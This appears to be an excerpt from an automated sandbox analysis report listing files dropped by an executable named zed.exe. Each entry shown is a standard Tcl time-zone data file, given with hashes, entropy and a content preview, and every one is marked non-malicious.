                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.887593462838566
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/0nogS64IAcGEsAzEB:SlSWB9vsM3y7hzi2HAIgphznN/0Hd499
                                                                                                                                                                                                                                            MD5:A4237BDCAF68B0EFECA97178F3DEE724
                                                                                                                                                                                                                                            SHA1:A9CBC02B5545A63A0C9B38C8FA7FA2DE6D483188
                                                                                                                                                                                                                                            SHA-256:46BA00AE3A07A4DC83D6CB517D87C9CBBA491B3421FE9AD6C74CAC5695EB73F7
                                                                                                                                                                                                                                            SHA-512:832BF256BE8CB2DD205DDE50017448D5830B46FF4DCA77BDB852067EE0C9DF9977014F2A3E3DD6944336158D8EA377CFBBE519EE5B56FB26EB64325B45476B9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:Canada/Saskatchewan) $TZData(:America/Regina)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.889486451014262
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7peR2fkSHAIgppeR2rN/0CF/490peR24:MByMYkGk7pkOtBQ90kB
                                                                                                                                                                                                                                            MD5:490D99BD5465CBF5A8FE28F33180B8A6
                                                                                                                                                                                                                                            SHA1:4783295C31A804BE98145270ED28956A0783E655
                                                                                                                                                                                                                                            SHA-256:A1B1AF37DC89C6BA663E4E967A18409AE4E0FA9EF1B908D0461368DA31001C09
                                                                                                                                                                                                                                            SHA-512:9F6B4F204A21B69E1DFCB766C0671D3736414C73269DCEDCDB4FC3DBA869BBA1511DF6B5061F8964F0AF9C3816133D04E5DFB8A6AD07CA06E7712787A8FECC5A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Whitehorse)]} {.. LoadTimeZoneFile America/Whitehorse..}..set TZData(:Canada/Yukon) $TZData(:America/Whitehorse)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                                                                                            Entropy (8bit):4.812019117774239
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7tfEJkHAIgptfEJo5N/0rHM490tfEJB:MByMYE9pEOt4X90EB
                                                                                                                                                                                                                                            MD5:6EF54792279C249B16877100682F1806
                                                                                                                                                                                                                                            SHA1:A62629EA055207D917740E3AEF4F0B005EA49CC4
                                                                                                                                                                                                                                            SHA-256:5B40167DD0C0B5C293861070C4AC249F78DDF8BAD798DD0165E3AE894C9B9570
                                                                                                                                                                                                                                            SHA-512:3CF93003C3EA2B4386660F0C87074F9AE2BAC4EE72D88451DCB1EA8B79502D2187B1608B6D5CE8D7EDC00AED99CF9DB7B006EB6ED2A2B5009F2C0E757D282D74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Santiago)]} {.. LoadTimeZoneFile America/Santiago..}..set TZData(:Chile/Continental) $TZData(:America/Santiago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.808907056781067
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG7ZAJWXHAIgObT7ZAiFvRL/0bxOdBx/nUDH7ZAZv:SlSWB9vsM3ycJAUHAIgObJAiRN/04dBn
                                                                                                                                                                                                                                            MD5:2EC4FDD1EFBAF1D9F9DBAC8B1B5EDD09
                                                                                                                                                                                                                                            SHA1:FECED8EBC7B666628B7B45C9694FCB3A0B20A42A
                                                                                                                                                                                                                                            SHA-256:1E2DA1862E0E0F131B7C6EB12FAC5F920852C61C162993A30BC843A464A5AAD4
                                                                                                                                                                                                                                            SHA-512:74D61141505BAF1ABAD61FB91941C63C169EFE3C85829FEBB4D29A72EA54D1A07EC84E2E9B48E963E65CBF7663245459FAD288D620B1BEFFE682A2D1C243794D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Easter)]} {.. LoadTimeZoneFile Pacific/Easter..}..set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                                                            Entropy (8bit):4.857134440822812
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02TEMVFfXHAIg202TEyRRL/0lIAcGE2TEMy:SlSWB9vsM3y76EkHAIgp6EyRN/0l9068
                                                                                                                                                                                                                                            MD5:3FB16EA4A9B0529220133C4A7B05215B
                                                                                                                                                                                                                                            SHA1:BD56B6E76A92A5925140CB5CC3D940E1DE90993F
                                                                                                                                                                                                                                            SHA-256:6F4F2D7F5BCA4E5183460C0153D2B98F5239A99F149DE6638B311C73CEDB1329
                                                                                                                                                                                                                                            SHA-512:690EC1BCE7FA979BD55725B8ED6DF042BB331CAD332827B2C64B31F107539934AA5A30268B1F03D52697528E68A1BA72E4D56B5199A68B1ED897B75FAFB33A8A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Havana)]} {.. LoadTimeZoneFile America/Havana..}..set TZData(:Cuba) $TZData(:America/Havana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7440
                                                                                                                                                                                                                                            Entropy (8bit):3.695300167191082
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:CgDIMcVbf+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlt:KlfyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:34339D40AC889DCB5A09D10F123175AD
                                                                                                                                                                                                                                            SHA1:57E1F70FA8999106FA3874A9CE1E75A7ACBC81E9
                                                                                                                                                                                                                                            SHA-256:64E284F9F7A36CC0A352809141D76E73A99344A9F30CFFEA254CBB9D2C589ADA
                                                                                                                                                                                                                                            SHA-512:2DCF16D9D7593FC3E5844E18FD689AADA157866490CFD37A38A47F747DDA189822055F6DD470CA2D77040D2C5A2527512880C22ED8EC16D9424EDF3DC228AFED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EET) {.. {-9223372036854775808 7200 0 EET}.. {228877200 10800 1 EEST}.. {243997200 7200 0 EET}.. {260326800 10800 1 EEST}.. {276051600 7200 0 EET}.. {291776400 10800 1 EEST}.. {307501200 7200 0 EET}.. {323830800 10800 1 EEST}.. {338950800 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                            Entropy (8bit):4.924838898127838
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yLbNMXGm2OHLVva0v:SlSWB9eg/ylDm2OHLVi0v
                                                                                                                                                                                                                                            MD5:B221E7141FFC9DEA317F64F81C7BB4E0
                                                                                                                                                                                                                                            SHA1:B13BBDE790B169D8B9075275523F319D5173E2C7
                                                                                                                                                                                                                                            SHA-256:6344BE02529C1CC5F7B5FE14B7E9BBCED4DDE68A24B824601EEBCAE207ABFDF2
                                                                                                                                                                                                                                            SHA-512:FFFA733476D6C7DCF49C0B88C9F5E381DE2B69BAEDF6C7B1D91C6F45CE2D36E06D40F25B6BB65D4B5D650471BB52CD2EC3F68703DAB4BD5414F8D3F831D92BD2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST) {.. {-9223372036854775808 -18000 0 EST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.8091719283634853
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:R+kNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:RXoSItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:4578FE48781599B55F4BCF5560019789
                                                                                                                                                                                                                                            SHA1:4EAA7134621DFDEBFD1405F5CC58227FA7E80C3A
                                                                                                                                                                                                                                            SHA-256:0BE6161403BC5A96BFAB174F2C3FCBA8A677D4349699B408E9872B9DD0FE15CE
                                                                                                                                                                                                                                            SHA-512:9ACC2EF396F635D22E3DF6B785831AD74B510049F1BE85F996467A5BBC0DF49A28B2FC3E4CA0CA9DC8FC2C29EA50D909F0B153265B107445D3052E81D9A4D50A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST5EDT) {.. {-9223372036854775808 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-84387600 -14400 1 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.862365884559795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsPHV5XHAIgNGE7TRRL/yCh0DcPHy:SlSWB9vsM3y7fHAIgNTRN/yg0DH
                                                                                                                                                                                                                                            MD5:ACD69F34396296BA553243267D06CEE0
                                                                                                                                                                                                                                            SHA1:9575FFE5E7833B9532F17AC5413EA9DB23F07ECA
                                                                                                                                                                                                                                            SHA-256:936B6484469351DEF8FAFE8EC180862729F5E43BDE4E53E2E9636E221B54C3C2
                                                                                                                                                                                                                                            SHA-512:149D23FF35747127E9A2F4056D09472E8E689970BC795D5411C5BF621D949ADDEBDA68674D375A248A63106ABDFF6C54A8AFE5385C45BE2916CAED0C30F7C4A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Cairo)]} {.. LoadTimeZoneFile Africa/Cairo..}..set TZData(:Egypt) $TZData(:Africa/Cairo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):172
                                                                                                                                                                                                                                            Entropy (8bit):4.901791318009318
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV5QH+o3vXHAIgoq6QHFRRL/yMQs/h8QanQHuv:SlSWB9vsM3ymnQeoPHAIgonQzN/yM/hm
                                                                                                                                                                                                                                            MD5:E9C2C97EB65526F1D4BE1AD7385336FA
                                                                                                                                                                                                                                            SHA1:09E4000CE320F779E2DFCA2FFD6B9258FFBA6CE4
                                                                                                                                                                                                                                            SHA-256:B78A833337EFEC8B5F64622F1BFDA21FCB79CF290E9CF32A54B206EB20C6FDE9
                                                                                                                                                                                                                                            SHA-512:EAEC097B58BF466CC7D6C0C6297628AF910CC308AC822565FD6CDABF96CD4EC57D4CC724FE782B6C1B606DFF9424013F6A890A871339577F7CB68BBB3C425E65
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Dublin)]} {.. LoadTimeZoneFile Europe/Dublin..}..set TZData(:Eire) $TZData(:Europe/Dublin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                                                            Entropy (8bit):4.928744204623185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDMbNMXGm2OHvDwy:SlSWB9eg/yRQJDm2OHsy
                                                                                                                                                                                                                                            MD5:9C08898081382F52CE681B592B8E2C8D
                                                                                                                                                                                                                                            SHA1:165944424740B1FA9B4B3B8E622198ABD0BDA0F8
                                                                                                                                                                                                                                            SHA-256:66B0DF8888883BFF44B18728B48CDF24AAED0BB745D601F3422C4F2D4063E0AC
                                                                                                                                                                                                                                            SHA-512:86EA639F999169F2FBA2457BE5042463A1938031268CCA71FDD03CCBC6194932937BA58B49FBED461E055E9AA668FF6EBF391AA7EC603C0A425416DF2E6CC84D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT) {.. {-9223372036854775808 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.910789466104329
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDOm7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRSw8RQy
                                                                                                                                                                                                                                            MD5:333F2BFA92742A49BB88F11C7CD896A9
                                                                                                                                                                                                                                            SHA1:BB5BEC010C36427AEEBDDA2FB72083E22A3F5073
                                                                                                                                                                                                                                            SHA-256:64466EA3759301E88C29AD1A833CDCBBC495EB4A5A3AC45E7B2987FECD6702BD
                                                                                                                                                                                                                                            SHA-512:E2270F4B57C5F1C849726259B886E8644DCF497FA0D034AD48885146BEDC70DC8899900DA9AC01F2609A2DA881E10F9042CCBF75A3F5DA7344D7E92F1B070806
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.980500771169276
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOveyXMXGm2OH1VOwVn:SlSWB9eg/yRSvPDm2OH1VOwV
                                                                                                                                                                                                                                            MD5:A7C3FD06D1E06F125813C9687C42067C
                                                                                                                                                                                                                                            SHA1:515622C0B63E977AFBFC78AD8466053C4A4A71A6
                                                                                                                                                                                                                                            SHA-256:3BE1EC71D2CC88FA9A3DB7DC0476475F33FE5BCBE6BC35C0F083859766466C32
                                                                                                                                                                                                                                            SHA-512:548DA608CFCA5B8539652F94CA2040D624602D2DF64B2C8CCDB8B219B9B384E01386CDF95F3BF77409DF0584FA12A3B73D56D13107D98BEB4C2555F458B3F374
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+1) {.. {-9223372036854775808 -3600 0 -01}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118
                                                                                                                                                                                                                                            Entropy (8bit):4.965033464829338
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOPFNMXGm2OH1VYU7vV:SlSWB9eg/yRSPXDm2OH1VYW9
                                                                                                                                                                                                                                            MD5:FF71149E56D4CB553D0ED949B5F4C122
                                                                                                                                                                                                                                            SHA1:3459B47E0EEC80D7A29512CA4F3F236C89E86573
                                                                                                                                                                                                                                            SHA-256:E61E826E6FBC2396EF152640698098F4477D4FFDFE5F791F62250C3EC5865304
                                                                                                                                                                                                                                            SHA-512:43B0CC8BD7F1EFC80C3F14F115D651EADD5743B17B854C2FB7AC25995138D3DF8792915C2952B80F35784A7115F8FB335ACE171479B24C668190AC175523DB21
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+10) {.. {-9223372036854775808 -36000 0 -10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118
                                                                                                                                                                                                                                            Entropy (8bit):5.002239901486653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOeJMXGm2OHaBByVn:SlSWB9eg/yRSsDm2OHa7yV
                                                                                                                                                                                                                                            MD5:08AABA917A8D6B3BB3D0DD1637F5ABFC
                                                                                                                                                                                                                                            SHA1:D1D704F0250D4CBD450922A02D021E0000FBF5CF
                                                                                                                                                                                                                                            SHA-256:143528946275DDC8B894218D3F1BE56C950F740828CEC13166C3D7E8E1B6BB7E
                                                                                                                                                                                                                                            SHA-512:F37AE54864A613C830308CB94AB7CEA9534A86A53B52B4A2C28CEEFE6F5BC0518143AAFD77A6DA5EC55D392F5BD34FCD4B5BE51794B1A386ED783B9BA89C10C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+11) {.. {-9223372036854775808 -39600 0 -11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118
                                                                                                                                                                                                                                            Entropy (8bit):4.97889339723103
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDONdNMXGm2OH3FNyUFFv:SlSWB9eg/yRSNDm2OH3XyMv
                                                                                                                                                                                                                                            MD5:7374B66D6E883D7581E9561C3815EB92
                                                                                                                                                                                                                                            SHA1:235E96A7420DF6733F3CA368D4A2D57766656043
                                                                                                                                                                                                                                            SHA-256:A93EAFAC2C1089C608C8536127D0E8B53D8C7CFD13AE7DD69339E12A89F803C6
                                                                                                                                                                                                                                            SHA-512:9BA59B17F20D65DFF1A5A2D557B535F69B04C172AECB15F88CA3484D74CC7D53894985C08653CF13D868BCBD5E7E5041E0CB2F457B5B603F3851198E552E33A7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+12) {.. {-9223372036854775808 -43200 0 -12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.922268982357521
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOcF3vFNMXGm2OHnFQVIyV:SlSWB9eg/yRS0fXDm2OHnFQVb
                                                                                                                                                                                                                                            MD5:FDDC663E40F8FFFE27959E94625725DF
                                                                                                                                                                                                                                            SHA1:EE3FBC1F6C8BBCF1BDC9E5DB4D2EA1A57E2E9BB3
                                                                                                                                                                                                                                            SHA-256:AD5833153446960BDE0653A22AE2111BF80CFD61C3010993CE87B81D40C75C72
                                                                                                                                                                                                                                            SHA-512:A1B2A153834FEAD7DC27C0918E1B1CB905671F82850C1CAAEBD89F5535703FB259F02F699EA7F82F3044E37668EE93DFA4D4EB862CD437AFF0DABA84867B1963
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+2) {.. {-9223372036854775808 -7200 0 -02}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.949132511023475
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOFfMXGm2OHBFVGAvFv:SlSWB9eg/yRSlDm2OHBFAKV
                                                                                                                                                                                                                                            MD5:5C6F16F2CFD46030688066F9BFBE675D
                                                                                                                                                                                                                                            SHA1:1DB5F36584822EB92E75B9AC9F440FD671BD90AE
                                                                                                                                                                                                                                            SHA-256:C7BEE4C71905EDDB40BAF42C0CD0DC70BB9F298EAAB8B9367D484B8431DD084A
                                                                                                                                                                                                                                            SHA-512:FFB2C4CD8EA7DE165C3D989454898FF2023D1A1E3B2B34EC23B1B71EFA7BF2538488DA0069E59F1152B8933D2263B762D2D7C56ADBED826C33FC0BA6672E34DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+3) {.. {-9223372036854775808 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.971627677226461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOqJMXGm2OHBvGQy:SlSWB9eg/yRSQDm2OHBON
                                                                                                                                                                                                                                            MD5:E35244C1A6084C7BC1D79E437677C55C
                                                                                                                                                                                                                                            SHA1:898619DA4B8B9AC72E69C7BD30DEA2ADEF9440FE
                                                                                                                                                                                                                                            SHA-256:26D1EF512CC5797FC63BA2B83C7D6271025F4D4F5C904D9FA8E97F053393D9A7
                                                                                                                                                                                                                                            SHA-512:0687758558C4C5FF7802F3A57212694A1515761A8337D4B75FFE81434D2AD8A221B005DEC36BF013F2FC3DE1E46DFBED36352811EB7C5A5AE3A167A2E314F57C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+4) {.. {-9223372036854775808 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.956438091983076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOJNMXGm2OHLVvyV6Aov:SlSWB9eg/yRSDDm2OHLVKVg
                                                                                                                                                                                                                                            MD5:7C560A0F3C42E399AC1247CB6C516DC6
                                                                                                                                                                                                                                            SHA1:C314B09D4E369C69C23A8DC1FB066FD0CFDC7211
                                                                                                                                                                                                                                            SHA-256:054910BDDFC44D9B806BBD3008C30547FA57ECD3C043418C406A725158144688
                                                                                                                                                                                                                                            SHA-512:FCE8431B759BD5359847734FD98D9D91394916235B2AF587FC927D5F3196FB283E241A6A9200EA852F9265ECEF81402FF6ACD0FA3A4AAEF6DF9DB1B056B3A9EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+5) {.. {-9223372036854775808 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.974743300958087
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOAkSMXGm2OHvTmULyn:SlSWB9eg/yRSbSDm2OHviX
                                                                                                                                                                                                                                            MD5:EEB1A3E0FD3339E332587D19C116D4EF
                                                                                                                                                                                                                                            SHA1:5DBF046031CD354B1EF88E46D3FED74706D21AC6
                                                                                                                                                                                                                                            SHA-256:D53BB247E0E429A6243AB9A9BDCAE1EE1CF5F271D79748A843631906AB63A988
                                                                                                                                                                                                                                            SHA-512:07BDF9056DC335C773684E634B1D389FBD139464D4597DE862B7EAC096676A093934682BF911F4E68F299789931218C0E431F0CC6BEBD7275B5FC8015EDD0942
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+6) {.. {-9223372036854775808 -21600 0 -06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.930134062078826
                                                                                                                                                                                                                                            Encrypted:false
